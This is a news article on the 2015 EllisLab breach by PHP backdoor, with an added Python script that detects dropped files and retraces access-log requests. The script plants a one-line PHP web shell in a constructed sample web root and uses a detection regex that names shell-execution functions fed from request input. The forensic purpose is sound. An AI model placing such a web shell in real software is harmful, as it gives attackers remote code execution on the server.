EllisLab, the software developer behind the popular CMS platform ExpressionEngine, was informed by its web host of a security breach and, after a delay, passed the warning on to its customers. On May 1, 2015 the company announced that attackers had targeted it and gained access to customer data that may include addresses, email addresses, phone numbers and passwords. EllisLab's Super Admin password had in fact been stolen on March 24, 2015 via a popular PHP backdoor script that let the attacker into the server without any authentication. The technique is a common one, but EllisLab chose to disclose the incident as a post-mortem, more than a month after the intrusion took place.
According to the company, the attackers had only three hours of uninterrupted access before the web host, Nexcess, noticed the breach. Nexcess says it was alerted to "malicious activity" after numerous attempts to gain root access on the server failed; it "immediately shut down access at the firewall level" and got in touch with EllisLab. That speed was not matched when it came to notifying customers. Building a damage-control strategy takes time, and many companies want to gauge exactly how severe the damage is before facing a customer and media firestorm.
A Practiced Approach
EllisLab says, “We began dissecting the server logs to retrace their steps and learn how they gained access. We went through all our files to remove what they added. We also audited ExpressionEngine, since we would need to release a patch before disclosing the attack if the breach was due to an exploit.” The good news is that the attackers did not get into the company database, but EllisLab combed through every potential vulnerability rather than assume anything. Attackers sometimes obtain very sensitive data and hold onto it before acting on it (and sometimes never use it at all).
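The two steps EllisLab describes, retracing the attacker's requests in the server logs and finding the files they added, are easy to reconstruct. The script below is an added example, not EllisLab's or Nexcess's code: it diffs a known-good file manifest against the current web root, flags added or changed PHP files whose source shows common backdoor markers (eval of decoded input, a shell function fed straight from a request parameter), and then pulls every request to those files out of the access log. It assumes the combined log format that Apache and nginx use by default (the real log format is not stated), and the web root and log lines it operates on are constructed here for the demonstration.

```python
"""Added example (not EllisLab's or Nexcess's code): detect files dropped into a
web root and retrace the requests that reached them, over constructed data."""
import hashlib
import os
import re
import tempfile

# Apache/nginx combined log format (assumption: the server logs in this format).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)

# Heuristic markers seen in common PHP backdoors; a triage aid, not a signature.
SUSPICIOUS_PHP = re.compile(
    r'eval\s*\(\s*(base64_decode|gzinflate|str_rot13)|'
    r'(system|shell_exec|passthru|exec)\s*\(\s*\$_(GET|POST|REQUEST)',
    re.IGNORECASE,
)


def sha256_of(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def manifest(webroot):
    """Map each file's path (relative to webroot) to its SHA-256."""
    out = {}
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            full = os.path.join(dirpath, name)
            out[os.path.relpath(full, webroot)] = sha256_of(full)
    return out


def find_added_or_changed(baseline, current):
    """Files present now that the known-good manifest lacks or hashes differently."""
    return sorted(p for p, h in current.items() if baseline.get(p) != h)


def scan_php_source(webroot, rel_path):
    """True if the file's source matches one of the backdoor heuristics."""
    with open(os.path.join(webroot, rel_path), "r", errors="replace") as f:
        return bool(SUSPICIOUS_PHP.search(f.read()))


def retrace_requests(log_lines, flagged_paths):
    """(ip, timestamp, method, path, status) for every request to a flagged file."""
    wanted = {"/" + p.replace(os.sep, "/") for p in flagged_paths}
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]  # drop the query string
        if path in wanted:
            hits.append((m.group("ip"), m.group("ts"), m.group("method"),
                         path, int(m.group("status"))))
    return hits


def build_sample():
    """Constructed sample: a clean web root, a dropped backdoor, and log lines."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php echo 'hello'; ?>\n")
    baseline = manifest(root)  # taken while the site is known-good
    # Attacker drops a backdoor into a directory that should only hold images.
    with open(os.path.join(root, "images", "cache.php"), "w") as f:
        f.write("<?php eval(base64_decode($_POST['c'])); ?>\n")
    log = [  # constructed access-log lines, documentation-range IPs
        '203.0.113.7 - - [24/Mar/2015:02:11:09 +0000] "GET /index.php HTTP/1.1" 200 512',
        '203.0.113.7 - - [24/Mar/2015:02:12:41 +0000] "POST /images/cache.php HTTP/1.1" 200 77',
        '203.0.113.7 - - [24/Mar/2015:02:13:05 +0000] "POST /images/cache.php?x=1 HTTP/1.1" 200 1402',
        '198.51.100.9 - - [24/Mar/2015:02:20:00 +0000] "GET /images/logo.png HTTP/1.1" 404 0',
    ]
    return root, baseline, log


def investigate(webroot, baseline, log_lines):
    """Added/changed files, which of them look like backdoors, and who hit them."""
    changed = find_added_or_changed(baseline, manifest(webroot))
    backdoors = [p for p in changed if p.endswith(".php") and scan_php_source(webroot, p)]
    return {"changed": changed, "backdoors": backdoors,
            "requests": retrace_requests(log_lines, backdoors)}


if __name__ == "__main__":
    root, base, log = build_sample()
    print(investigate(root, base, log))
```

The baseline manifest is the part most sites lack: without a hash list taken while the site was known-good (or a comparison against the vendor's release tarball), "went through all our files to remove what they added" means reading every file by hand. The source heuristics only catch the obvious backdoors; a file that merely looks out of place (PHP in an images or uploads directory) deserves a look even when no pattern fires.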
Fortunately, no financial information, such as saved payment data, appears to have been taken. Member profile information was the most sensitive data stolen; EllisLab says parts of credit card information, such as the last four digits shown on invoices, may also have been accessed, along with data from support tickets opened in February and March. None of that is directly usable for fraud, but it is exactly the kind of detail that makes a phishing email or a support-line impersonation convincing, which is one reason the password reset EllisLab recommends matters.
What Customers Can Do
The company is urging its customers to change their passwords on the site and passwords that may have been created for support tickets. “Being the direct target of a criminal attack has been a learning experience and we hope to use what we’ve learned to help our customers,” EllisLab wrote in a post. “We have discovered some server changes that you can make to help secure your site and limit the damage that a bad actor can do. And even though ExpressionEngine was not exploited in this attack, our audit led to further security enhancements in our latest 2.10.1 release which you can download now.”
EllisLab has also added general security advice to its site to help customers better safeguard their data. This is not the first time Nexcess has found and quickly acted on an exploit: in 2014 it dealt with an exploit involving Magento that led to credit card information being copied and accessed during checkout.